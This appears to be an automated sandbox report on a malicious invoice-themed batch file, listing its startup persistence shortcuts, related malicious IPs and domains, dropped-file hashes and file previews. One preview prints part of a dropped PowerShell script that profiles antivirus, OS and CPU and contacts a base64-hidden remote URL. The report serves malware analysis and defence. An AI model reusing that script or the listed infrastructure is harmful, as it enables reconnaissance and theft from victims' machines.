                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Factura-2410-CFDI.bat
                                                            Detection:MAL
                                                            Classification:mal100.rans.expl.evad.winBAT@26/50@1/3
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 389
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .bat
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.251.32.106, 142.250.80.106, 142.250.80.74, 142.251.40.138, 142.251.41.10, 142.250.176.202, 142.251.35.170, 142.250.64.74, 142.251.40.202, 142.250.80.42, 142.250.65.170, 142.250.80.10, 142.250.72.106, 142.251.40.234, 142.251.40.106, 142.251.40.170, 52.168.117.173
                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, firebasestorage.googleapis.com
                                                            • Execution Graph export aborted for target _kjfech8_Vi7.exe, PID 3204 because there are no executed function
                                                            • Execution Graph export aborted for target powershell.exe, PID 8092 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: Factura-2410-CFDI.bat
Time | Type | Description
00:21:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
00:21:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnk
00:22:03 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnk
00:22:23 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnk
00:22:43 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnk
18:21:24 | API Interceptor | 825x Sleep call for process: powershell.exe modified
18:22:05 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
93.127.200.211 | pw.ps1 | malicious | Unknown | 93.127.200.211/a/08/150822/au/logs/index.php?CHLG
62.72.3.210 | KKKK.hta | malicious | Unknown |
86.38.217.167 | pw.ps1 | malicious | Unknown | 86.38.217.167/09/index.php
86.38.217.167 | Facturas-5MngNH.lnk | malicious | Unknown | 86.38.217.167/lnkld

Match | Associated Sample Name / URL | Detection | Threat Name | Context
fsnat.shop | pw.ps1 | malicious | Unknown | 93.127.200.211
fsnat.shop | FacturasEnAdjunto-HHH.hta | malicious | Unknown | 93.127.200.211
fsnat.shop | FacFiscalDigitalenmi6Q8V_C(549).PDF.vbs | malicious | Unknown | 89.116.236.122
fsnat.shop | 6.vbs | malicious | Unknown | 89.116.236.122

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PRTL-DE | SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe | malicious | GuLoader | 62.72.43.173
PRTL-DE | SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe | malicious | GuLoader | 62.72.43.173
PRTL-DE | JJLOVjVrYv.elf | malicious | Mirai, Gafgyt | 195.214.110.183
PRTL-DE | jYEvdBHMOI.elf | malicious | Mirai | 195.214.110.190
PRTL-DE | UMOWA_09.BAT.exe | malicious | FormBook, GuLoader | 62.72.43.173
PRTL-DE | UMOWA_09.BAT.exe | malicious | FormBook, GuLoader | 62.72.43.173
PRTL-DE | #U0421#U041f#U041e#U0420#U0410#U0417#U0423#U041c#U0415#U041d#U0418#U0415-pdf.bat.exe | malicious | GuLoader | 62.72.43.173
PRTL-DE | KKKK.hta | malicious | Unknown | 62.72.3.210
PRTL-DE | Payment_Notice_RECIPIENT_NAME.htm | malicious | EvilProxy, HTMLPhisher | 62.72.19.33
PRTL-DE | 8tGqHMzByM.elf | malicious | Mirai | 195.214.110.185
ASMUNDA-ASSC | JuyR4wj8av.exe | malicious | Stealc, Vidar | 93.127.208.30
ASMUNDA-ASSC | EL7ggW7AdA.exe | malicious | Stealc, Vidar | 93.127.208.30
ASMUNDA-ASSC | arm6.elf | malicious | Unknown | 93.127.202.25
                                                              https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                              • 93.127.179.137
                                                              https://nationalrecalls.com/outbound-scheduling-callsGet hashmaliciousUnknownBrowse
                                                              • 93.127.179.248
                                                              KKKK.htaGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              pw.ps1Get hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              https://maryscenter2-my.sharepoint.com/:o:/g/personal/gmiranda_maryscenter_org/EmGp6Dkk921NtUdFUcUMh9oBCA8FTTR3eEy2-FPQR40DVA?e=Ix5141Get hashmaliciousSharepointPhisherBrowse
                                                              • 93.127.186.197
                                                              https://glamis-house.com/?email=Get hashmaliciousHTMLPhisherBrowse
                                                              • 93.127.186.197
                                                              LRTC-ASLTla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                              • 86.38.197.160
                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                              • 89.117.25.51
                                                              eETnl6XIwnGet hashmaliciousUnknownBrowse
                                                              • 89.117.72.231
                                                              8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 89.117.139.59
                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 86.38.65.119
                                                              Reader_PDF_2024.exeGet hashmaliciousUnknownBrowse
                                                              • 89.117.72.231
                                                              Reader_PDF_2024.exeGet hashmaliciousUnknownBrowse
                                                              • 89.117.72.231
                                                              https://oplaesa.krtra.com/c/HEacb57dq4Yf/pNyXGet hashmaliciousUnknownBrowse
                                                              • 89.117.144.56
                                                              https://firebasestorage.googleapis.com/v0/b/lecongtai-bb82b.appspot.com/o/16-10%2FCompilation%20of%20copyright-protected%20videos%20and%20images.zip?alt=media&token=c97d235f-3349-47aa-b756-15ecdbdf39b1Get hashmaliciousPython Stealer, BraodoBrowse
                                                              • 86.38.202.97
                                                              TF-5713011_slip (2).jarGet hashmaliciousBranchlock ObfuscatorBrowse
                                                              • 86.38.225.161
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eSUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 93.127.200.211
                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 93.127.200.211
                                                              WINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 93.127.200.211
                                                              MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              gI1wz7QtZV.lnkGet hashmaliciousLonePageBrowse
                                                              • 93.127.200.211
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\_kjfech8_V\MSVCR100.dll (copy)mXF65oa1GJ.exeGet hashmaliciousUnknownBrowse
                                                                mXF65oa1GJ.exeGet hashmaliciousUnknownBrowse
                                                                  Confirm Me.exeGet hashmaliciousSTRRATBrowse
                                                                    PInstaller.exeGet hashmaliciousSTRRATBrowse
                                                                      123.sfx.exeGet hashmaliciousSTRRATBrowse
                                                                        KKKK.htaGet hashmaliciousUnknownBrowse
                                                                          formatfactory-4-6-1-0.exeGet hashmaliciousUnknownBrowse
                                                                            formatfactory-4-6-1-0.exeGet hashmaliciousUnknownBrowse
                                                                              EYOFFTITMDLXZJFFCCGFDTBIY.msiGet hashmaliciousUnknownBrowse
                                                                                SSCBOLGZFXVJMEICRNQMJOCDIF.msiGet hashmaliciousUnknownBrowse
                                                                                  C:\Windows \System32\fodhelper.exerPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                    KKKK.htaGet hashmaliciousUnknownBrowse
                                                                                      ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                        IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          7XU2cRFInT.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                              Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                Payroll for July.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  2nd_Quarter_Order_Sheet_xls_0000000000000000000.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    Import_Tax Invoice_PL_xls_0000000000000000000 .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.9933003261985374
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
Preview:Version=1..EventType=APPCRASH..EventTime=133744549242521937..ReportType=2..Consent=1..UploadTime=133744549245802480..ReportStatus=524384..ReportIdentifier=79ce850f-cd16-4317-9d1c-184b0f22106c..IntegratorReportIdentifier=cf8b2bd1-0c3f-4ef6-a94f-04daae30d78a..Wow64Host=34404..Wow64Guest=332..NsAppName=_kjfech8_Vi7.exe..OriginalFilename=kinit.exe..AppSessionGuid=000005d4-0001-004d-55dd-fb7bf527db01..TargetAppId=W:00067d351955104c25db0212750d8144bf1600000000!0000615dc2fa827fab39e16a7e9721f484e7f4d3
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 22:22:04 2024, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):83718
                                                                                                      Entropy (8bit):1.8255383231410667
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8326
                                                                                                      Entropy (8bit):3.701838695089011
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>..<OSVersionInformation>..<WindowsNTVersion>10.0</WindowsNTVersion>..<Build>19042</Build>..<Product>(0x30): Windows 10 Pro</Product>..<Edition>Professional</Edition>..<BuildString>19041.1165.amd64fre.vb_release.191206-1406</BuildString>..<Revision>1165</Revision>..<Flavor>Multiprocessor Free</Flavor>..<Architecture>X64</Architecture>..<LCID>1033</LCID>..</OSVersionInformation>..<ProcessInformation>..<Pid>1492</Pi
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4818
                                                                                                      Entropy (8bit):4.523347303106581
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222904773" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26328
                                                                                                      Entropy (8bit):5.049018369731122
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3428
                                                                                                      Entropy (8bit):5.408200273959752
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=481, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1130
                                                                                                      Entropy (8bit):4.662948895705751
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:8dbaQrRU4IeZcCHqXWxI5ACmUyKTJaXWjEjA+2wu4f/XKbOkvEMBSgkNvLGwZv4m:8bMGu2UZTgmUA5f43aDEMBSnvaSJTvm
                                                                                                      MD5:EC08BF2F6319354637EC5CFB2928307B
                                                                                                      SHA1:A048C2957E4C64B0A8B6FB7151FADAA823B79A06
                                                                                                      SHA-256:DBE7E3E634391AA090E27A236194211963338DB400538198D8011B9369E9D06A
                                                                                                      SHA-512:546C10CB12793237291745EF349F01473B40E16C5AC7D6296FB4756172F4A3F384514A6E5EEBC75E587505F42A5959174910BAA5416A4B0FDD3958981D2BDF61
                                                                                                      Malicious:true
                                                                                                      Preview:L..................F.... ......q.'..H..q.'..H..q.'...............................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwHZY.......u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....ZY....Public..f......O.IZY......Du..............<......5..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....z.2.....ZY.. .W1064_~1.CMD..^......ZY..ZY................................W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V...c.m.d.......U...............-.......T............WW>.....C:\Users\Public\computer_kjfech8_V.cmd..5.....\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V...c.m.d.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......061544..............n4UB.. .|..oXRb......E.P..#.....n4UB.. .|..oXRb......E.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):549
                                                                                                      Entropy (8bit):2.9733182199850496
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4xtU1xRcxPhKDhACKDjMLAmIKDhACqBtw4ACAACqBZ2bOlyvEMl4Yrlcdt/:8GHRcXKWiLAmIKWhE36h/2bOkvEMBi
                                                                                                      MD5:25D62C08509B6F5A2A234895DD7F9531
                                                                                                      SHA1:29666F5CE912D83EB4CBE9026568592D946B121B
                                                                                                      SHA-256:F74453C9DD7089B0D4FE3F19E023A8DAE8A3B325F626C81C77FF9D95C0918666
                                                                                                      SHA-512:539CFC561ABE16C31EBA6BA602B19BD6A77917ED0DD5609B905A38CFF5170C055059AE40B3889A3892D7704D8205F5D63044475F0605995CC4CDE231FBF9C27D
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................`.1..........._kjfech8_V..F............................................_.k.j.f.e.c.h.8._.V.....r.2..........._kjfech8_Vi7.exe..R............................................_.k.j.f.e.c.h.8._.V.i.7...e.x.e... ...6.....\.....\.....\.....\.....\.....\.....\.....\.....\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V.i.7...e.x.e...C.:.\.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.....
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):2.9973063303812637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4xt2/b12RcxPhKDhACADjrmhACFAtM4ACAACFAjEbACyACAAC5UrbOlyvEMl4Yri:8wb4RcXKWL9EZ36EKEsI64gbOkvEMBi
                                                                                                      MD5:FF10667B4DE352B43BDE9FF5E7D851B2
                                                                                                      SHA1:EF53D29B6542E0571B43613B3AC183617D804184
                                                                                                      SHA-256:799F9DCBC3DB2B437DA52DA2C0A9928694BFE9B6DC6F62BD1F39C85A01E92D41
                                                                                                      SHA-512:16CC6EB7530D61A06DCE9B05540E86E44D13B12E997755FCDFD8CAB18BA16FF10B2F3521EFFEC7F7E3911DDFAB0564184B2B97AD8619B1C67E34BB5A4F904711
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................`.1..........._kjfech8_V..F............................................_.k.j.f.e.c.h.8._.V.....l.2..........._kjfech8_V.exe..N............................................_.k.j.f.e.c.h.8._.V...e.x.e.......4.....\.....\.....\.....\.....\.....\.....\.....\.....\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...e.x.e...C.:.\._.k.j.f.e.c.h.8._.V.\...C.:.\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...a.t.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.....
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):2.996511800404485
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:4xt2/b12RcxPhKDhACADjrmhACFAtM4ACAACFAjEbACyACAAC5TBbOlyvEMl4Yri:8wb4RcXKWL9EZ36EKEsI64TBbOkvEMBi
                                                                                                      MD5:E0F4813BC49568FD0575A24C54F79F1C
                                                                                                      SHA1:454E93B73AAA189889A34D0F490981AB9BFDBFCC
                                                                                                      SHA-256:823DB2B0FFAA5C69761E8FAEA7D548279D1C48E38B8FC05F44C355D8D1A9A785
                                                                                                      SHA-512:DFD5C21880B77A02D30180DF7352757D79E960829AEFBBAD7F3C30956667C57B8B8687DB6D4D12AAF8C7EB0BE9CE61A09DF2C7D42DAA8ACEA911A770999D2FE7
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................`.1..........._kjfech8_V..F............................................_.k.j.f.e.c.h.8._.V.....l.2..........._kjfech8_V.exe..N............................................_.k.j.f.e.c.h.8._.V...e.x.e.......4.....\.....\.....\.....\.....\.....\.....\.....\.....\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...e.x.e...C.:.\._.k.j.f.e.c.h.8._.V.\...C.:.\._.k.j.f.e.c.h.8._.V.\._.k.j.f.e.c.h.8._.V...a.i.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.....
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=482, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1135
                                                                                                      Entropy (8bit):4.66634468229895
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8ty6aMGuAFyF5TAKfqLDEMBSnvaERLJTvm:817G1Q06qLDvBSiUTv
                                                                                                      MD5:52E5A3D4D4C73848CB1E1096CD2227C9
                                                                                                      SHA1:4586D5AAEDB9479AF92D0EA48DF2CE1E9C8229C3
                                                                                                      SHA-256:4D41C55C24689E58F123CF16408AEF7477BD5549B13E155775FA504A96B020CF
                                                                                                      SHA-512:77E9E4DE111966AB0AB08C18688F9DA0418B697A72A88E2E11E0C887CDE1F2030F13E4EA61E51251355423A0148D54E3EC2FA3460276007ADE891F49F47F8822
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.... .....q.'....q.'....q.'...............................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwHZY.......u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....ZY....Public..f......O.IZY......Du..............<......N..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....|.2.....ZY.. .W1064_~2.CMD..`......ZY..ZY.............................N..W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V.y...c.m.d.......V...............-.......U............WW>.....C:\Users\Public\computer_kjfech8_Vy.cmd..6.....\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V.y...c.m.d.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......061544..............n4UB.. .|..ooRb......E.P..#.....n4UB.. .|..ooRb......E.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):2.968918563962097
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Q665AyXpn:Q64ACpn
                                                                                                      MD5:BE0D37AD6237FD8EA3C01C06C1CCF52A
                                                                                                      SHA1:E42CF8B5459C5AB4F6A2E3BF1849D817EB148829
                                                                                                      SHA-256:F5F443E1F6CFAA8A9D23324F8EAA986D3C34370136B3781704A87FF76C2B2B95
                                                                                                      SHA-512:E673FD497F86145D28ED2AD3CCEB0CE2651BD31BCE8329C6DA43835A3EC8F1493E670033FA050B114CF89CB70E352B99FE0BE310E24D78811895F02C4B05E328
                                                                                                      Malicious:false
                                                                                                      Preview:.._.k.j.f.e.c.h.8._.V.....
                                                                                                      Process:C:\Windows\System32\curl.exe
                                                                                                      File Type:awk or perl script, ASCII text, with very long lines (456), with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):26455
                                                                                                      Entropy (8bit):5.059985897734625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:GNiNrnhcaZWyW+ud7/r6jbw8GlftuLGuIwUcLMV8GGGMrGMbGb7Y4X5uGLMVadRq:A8rnhcaZWyW+ud7/r6jbw8GlftuLGuIm
                                                                                                      MD5:67F4511BB417F6CF9A57B2B3D09E9BDF
                                                                                                      SHA1:D15346D2BB0FF8C04DFB8BA2DE64778CA1480638
                                                                                                      SHA-256:D91DA055F8BE70FEF8B7E5B11849038C7E5BC8161ADC45691B95DED71F59819A
                                                                                                      SHA-512:DEF411D1F1523E20CF9BA5610AA17191163902732E23ED6E368912DCED5CB493AFA7F9CFE5B38A67D4E865A635BF448F740629F3F2A30B630FC12424CF8F9AD9
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\Public\Documents\vs1.ps1, Author: Joe Security
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:function ____///////// { ..[cmdletBinding()] ..param ( ..[string]$ComputerName = "$env:computername" , ..$Credential ..) .. BEGIN .. { .. $wmiQuery = "SELECT * FROM AntiVirusProduct" .. } .. PROCESS .. { $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters .. $AntivirusNames = $AntivirusProduct.displayName .. $lang = Get-Culture .. $lang = $lang.displayname.. .. $winds = (Get-WmiObject -class Win32_OperatingSystem).Caption.. if($env:PROCESSOR_ARCHITECTURE -eq "x86"){ $Bits =" 32-Bit CPU "}Else{ $Bits =" 64-Bit CPU "}.... $WebRequest = [System.Net.WebRequest]::Create(([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwA2ADIALgA3ADIALgAzAC4AMgAxADAALwBsAGQAaAB0AC8AaQBuAGQAZQB4AC4AcABoAHAA')))) ..
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
